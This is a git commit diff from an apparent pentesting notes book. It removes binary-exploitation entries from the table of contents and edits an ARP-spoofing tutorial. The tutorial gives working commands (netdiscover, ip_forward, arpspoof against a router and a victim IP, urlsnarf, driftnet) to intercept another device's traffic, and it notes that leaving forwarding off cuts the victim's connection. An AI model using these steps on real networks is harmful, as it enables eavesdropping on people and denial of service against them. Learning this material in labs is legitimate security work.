Commit cff0ea5e authored by bobloblaw's avatar bobloblaw
Browse files

Updates arp-spoofing.md

Auto commit by GitBook Editor
parent 9e704de4
Loading
Loading
Loading
Loading
+0 −11
Original line number Diff line number Diff line
@@ -83,17 +83,6 @@
    * [Online Password Cracking](online_password_cracking.md)
    * [Pass the Hash - Reusing Hashes](pass_the_hash_-_reusing_hashes.md)
* [Pivoting - Port forwarding - Tunneling](port_forwarding_and_tunneling.md)
* [Binary Exploitation](binary_exploitation2.md)
    * [Tools](tools.md)
    * [Basics of assembly](binary_exploitation.md)
    * [Buffer overflow \(BOF\)](buffer_overflow_bof.md)
    * [Vulnerabilities](vulnerabilities.md)
    * [Exploit examples and tutorials](exploit_examples_and_tutorials.md)
    * [Setuid c-code](setuid_c-code.md)
    * [Exploit-examples 2](exploit-examples_2.md)
    * [Windows exploitation](windows_exploitation.md)
        * [Immunity Debugger](immunity_debugger.md)
    * Msfvenom - Create shellcode
* [Network traffic analysis](network_traffic.md)
    * [Arp-spoofing](arp-spoofing.md)
        * [SSL-strip](ssl-strip.md)
+12 −5
Original line number Diff line number Diff line
# Arp-spoofing
# Arp-spoofing - Sniffing traffic



This tutorial assumes you are using kali, where these programs are already installed.

## Step 1

Run nmap or netdiscover to list the devices on the network.
 - `netdiscover -r 192.168.1.0/24` or whatever network range it is. This is good because it is live, and it updates as soon as new devices connect to the network.
`netdiscover -r 192.168.1.0/24` or whatever network range it is. This is good because it is live, and it updates as soon as new devices connect to the network.

```
nmap -vvv 192.168.1.0/24
```
@@ -16,6 +17,7 @@ nmap -vvv 192.168.1.0/24
```
echo 1 > /proc/sys/net/ipv4/ip_forward
``` 

this command is fundamental. Without changing it to `1`you will only block the traffic, but not forward it. So that will bring down the connection for that person. Denial of service. If you want to do that make sure it is set to 0. If you want to intercept it make sure it is set to 1.

## Step 3
@@ -23,6 +25,7 @@ this command is fundamental. Without changing it to `1`you will only block the t
```
arpspoof -i wlan0 -t 192.168.1.1 192.168.1.105
```

 - `-i` is the interface flag. In this example we choose the wlan0 interface. Run `ifconfig` to see which interfaces you have available.
 - `-t` the target flag. It specifies your target. The first address is the router, and the second is the specific device you want to target.

@@ -31,13 +34,17 @@ arpspoof -i wlan0 -t 192.168.1.1 192.168.1.105

So now you are intercepting the traffic. You have a few choices how to read it. 
Use urlsnarf. 

```
urlsnarf -i wlan0
``` 

it will output all URLs.

```
driftnet -i wlan0
```

Driftnet is pretty cool. It let's you see all the images that is loaded in the targets browser in real time. Not very useful, but kind of cool.
 - wireshark. Just open wireshark and select the interface and start capturing.
 - Tcpdump. Also awesome.
+0 −0

Empty file added.